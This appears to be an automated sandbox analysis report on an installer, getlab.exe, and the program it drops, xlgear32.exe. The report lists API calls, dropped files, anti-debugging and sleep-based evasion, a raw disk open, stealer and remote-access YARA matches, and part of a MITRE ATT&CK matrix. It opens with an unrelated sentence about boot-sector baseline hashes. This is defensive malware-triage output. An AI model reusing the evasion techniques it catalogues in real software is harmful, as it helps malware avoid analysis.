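The baseline hash should come from a golden image or from the same host's sector captured at build time, not from the suspect machine; a clean signature and partition table with a changed bootstrap hash is the pattern a bootkit leaves, while a changed table with the same code points at disk re-partitioning rather than boot-sector tampering.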
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_004241D4 IsIconic,SetActiveWindow,SetFocus, 1_2_004241D4
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_0042418C IsIconic,SetActiveWindow, 1_2_0042418C
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_0041837C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 1_2_0041837C
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_00422854 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 1_2_00422854
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_00482EF8 IsIconic,GetWindowLongA,ShowWindow,ShowWindow, 1_2_00482EF8
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_00417590 IsIconic,GetCapture, 1_2_00417590
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_00417CC6 IsIconic,SetWindowPos, 1_2_00417CC6
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_00417CC8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 1_2_00417CC8
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_0041F110 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary, 1_2_0041F110
Source: C:\Users\user\Desktop\getlab.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (8 occurrences)
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_60920C91 rdtsc 4_2_60920C91
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,4_2_00401B4B
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,4_2_02D9F9A7
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeWindow / User API: threadDelayed 6214Jump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeWindow / User API: threadDelayed 3693Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-NVVDJ.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-48NRD.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-48NRD.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\XLGear 3.1.3.157\uninstall\unins000.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-Q00OL.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-GH467.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-K4GKL.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\XLGear 3.1.3.157\LTDIS13n.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-48NRD.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\XLGear 3.1.3.157\msvcr71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\XLGear 3.1.3.157\uninstall\is-UJ38T.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\XLGear 3.1.3.157\gdiplus.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-VVRBT.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-B16F3.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\XLGear 3.1.3.157\msvcp71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\XLGear 3.1.3.157\bjpeg23.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\XLGear 3.1.3.157\ltkrn13n.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-4GRQU.tmpJump to dropped file
                    Source: C:\Users\user\Desktop\getlab.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-5687
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_4-60994
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeAPI coverage: 5.7 %
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe TID: 1440Thread sleep count: 6214 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe TID: 1440Thread sleep time: -12428000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe TID: 5800Thread sleep count: 34 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe TID: 5800Thread sleep time: -2040000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe TID: 1440Thread sleep count: 3693 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe TID: 1440Thread sleep time: -7386000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00452A34 FindFirstFileA,GetLastError,1_2_00452A34
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00474D70 FindFirstFileA,FindNextFileA,FindClose,1_2_00474D70
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00462578 FindFirstFileA,FindNextFileA,FindClose,1_2_00462578
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_004975B0 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_004975B0
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00463B04 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463B04
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00463F80 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463F80
                    Source: C:\Users\user\Desktop\getlab.exeCode function: 0_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B30
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeThread delayed: delay time: 60000Jump to behavior
                    Source: xlgear32.exe, 00000004.00000002.2936299565.0000000000818000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                    Source: xlgear32.exe, 00000004.00000002.2936299565.0000000000903000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: C:\Users\user\Desktop\getlab.exeAPI call chain: ExitProcess graph end nodegraph_0-6727
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeAPI call chain: ExitProcess graph end nodegraph_4-60761
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep (graph_4-60889)
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_60920C91 rdtsc 4_2_60920C91
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_02DB01BE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,4_2_02DB01BE
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_00450294 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00450294
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_02D9648B RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,4_2_02D9648B
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_02DA9528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_02DA9528
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_00477F98 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_00477F98
                    Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause xl_gear_11293
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_0042E094 AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,1_2_0042E094
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_02D9F85B cpuid 4_2_02D9F85B
                    Source: C:\Users\user\Desktop\getlab.exe | Code function: GetLocaleInfoA,0_2_004051FC
                    Source: C:\Users\user\Desktop\getlab.exe | Code function: GetLocaleInfoA,0_2_00405248
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: GetLocaleInfoA,1_2_00408558
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: GetLocaleInfoA,1_2_004085A4
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_004583E8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_004583E8
                    Source: C:\Users\user\Desktop\getlab.exe | Code function: 0_2_004026C4 GetSystemTime,0_2_004026C4
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_00455570 GetUserNameA,1_2_00455570
                    Source: C:\Users\user\Desktop\getlab.exe | Code function: 0_2_00405CE4 GetVersionExA,0_2_00405CE4

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000004.00000002.2937019748.0000000002CEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: xlgear32.exe PID: 3320, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match | File source: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000004.00000002.2937019748.0000000002CEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: xlgear32.exe PID: 3320, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_609660FA sqlite3_finalize,sqlite3_free,sqlite3_value_numeric_type,sqlite3_value_numeric_type,sqlite3_value_text,sqlite3_value_int,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_mprintf,sqlite3_malloc,sqlite3_free,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,4_2_609660FA
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6090C1D6 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,4_2_6090C1D6
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_60963143 sqlite3_stricmp,sqlite3_bind_int64,sqlite3_mutex_leave,4_2_60963143
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6096A2BD sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,4_2_6096A2BD
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6096923E sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_malloc,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_realloc,sqlite3_realloc,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,4_2_6096923E
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6096A38C sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,4_2_6096A38C
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6096748C sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_reset,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_bind_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_realloc,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,4_2_6096748C
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_609254B1 sqlite3_bind_zeroblob,sqlite3_mutex_leave,4_2_609254B1
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6094B407 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,4_2_6094B407
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6090F435 sqlite3_bind_parameter_index,4_2_6090F435
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_609255D4 sqlite3_mutex_leave,sqlite3_bind_text16,4_2_609255D4
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_609255FF sqlite3_bind_text,4_2_609255FF
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6096A5EE sqlite3_value_text,sqlite3_value_bytes,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_malloc,sqlite3_column_int,sqlite3_column_int64,sqlite3_column_text,sqlite3_column_bytes,sqlite3_finalize,sqlite3_step,sqlite3_free,sqlite3_finalize,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_column_int64,sqlite3_column_int,sqlite3_column_text,sqlite3_column_bytes,sqlite3_step,sqlite3_finalize,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_malloc,sqlite3_bind_null,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_value_text,sqlite3_value_bytes,sqlite3_free,4_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6094B54C sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,memmove,4_2_6094B54C
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_60925686 sqlite3_bind_int64,sqlite3_mutex_leave,4_2_60925686
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6094A6C5 sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_malloc,sqlite3_reset,sqlite3_free,4_2_6094A6C5
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_609256E5 sqlite3_bind_int,sqlite3_bind_int64,4_2_609256E5
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6094B6ED sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,4_2_6094B6ED
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6092562A sqlite3_bind_blob,4_2_6092562A
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_60925655 sqlite3_bind_null,sqlite3_mutex_leave,4_2_60925655
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6094C64A sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,4_2_6094C64A
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_609687A7 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_column_int64,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,4_2_609687A7
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6095F7F7 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,4_2_6095F7F7
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6092570B sqlite3_bind_double,sqlite3_mutex_leave,4_2_6092570B
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6095F772 sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,4_2_6095F772
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_60925778 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,4_2_60925778
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6090577D sqlite3_bind_parameter_name,4_2_6090577D
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6094B764 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,4_2_6094B764
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6090576B sqlite3_bind_parameter_count,4_2_6090576B
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6094A894 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,4_2_6094A894
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6095F883 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,4_2_6095F883
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6094C8C2 sqlite3_value_int,sqlite3_value_int,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_null,sqlite3_bind_null,sqlite3_step,sqlite3_reset,4_2_6094C8C2
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6096281E sqlite3_mprintf,sqlite3_vtab_config,sqlite3_malloc,sqlite3_mprintf,sqlite3_mprintf,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_exec,sqlite3_free,sqlite3_prepare_v2,sqlite3_bind_text,sqlite3_step,sqlite3_column_int64,sqlite3_finalize,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_errmsg,sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_free,sqlite3_declare_vtab,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,4_2_6096281E
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6096583A memcmp,sqlite3_realloc,qsort,sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_step,sqlite3_reset,4_2_6096583A
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6095F9AD sqlite3_bind_int,sqlite3_step,sqlite3_column_type,sqlite3_reset,4_2_6095F9AD
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6094A92B sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,4_2_6094A92B
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6090EAE5 sqlite3_transfer_bindings,4_2_6090EAE5
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6095FB98 sqlite3_value_int,sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset,4_2_6095FB98
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6095ECA6 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,4_2_6095ECA6
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6095FCCE sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,4_2_6095FCCE
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6095FDAE sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,4_2_6095FDAE
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_60966DF1 sqlite3_value_text,sqlite3_mprintf,sqlite3_free,strcmp,sqlite3_free,sqlite3_malloc,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset,sqlite3_column_blob,sqlite3_reset,sqlite3_malloc,sqlite3_free,sqlite3_reset,sqlite3_result_error_code,sqlite3_result_blob,4_2_60966DF1
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_60969D75 sqlite3_bind_int,sqlite3_step,sqlite3_column_int,sqlite3_reset,4_2_60969D75
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6095FFB2 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,4_2_6095FFB2
                    MITRE ATT&CK Matrix (reconstructed from the flattened table: each line is one tactic column read top to bottom; a leading number is the badge the report shows on a technique it matched)

                    Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS | Network Trust Dependencies | Network Topology | IP Addresses | Network Security Appliances
                    Resource Development: Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services | Serverless | Malvertising | Compromise Infrastructure | Domains
                    Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services | Drive-by Compromise | Exploit Public-Facing Application | Supply Chain Compromise | Compromise Software Dependencies and Development Tools
                    Execution: 3 Native API | 2 Service Execution | At | Cron | Launchd | Scheduled Task | Systemd Timers | Container Orchestration Job | Command and Scripting Interpreter | PowerShell | AppleScript
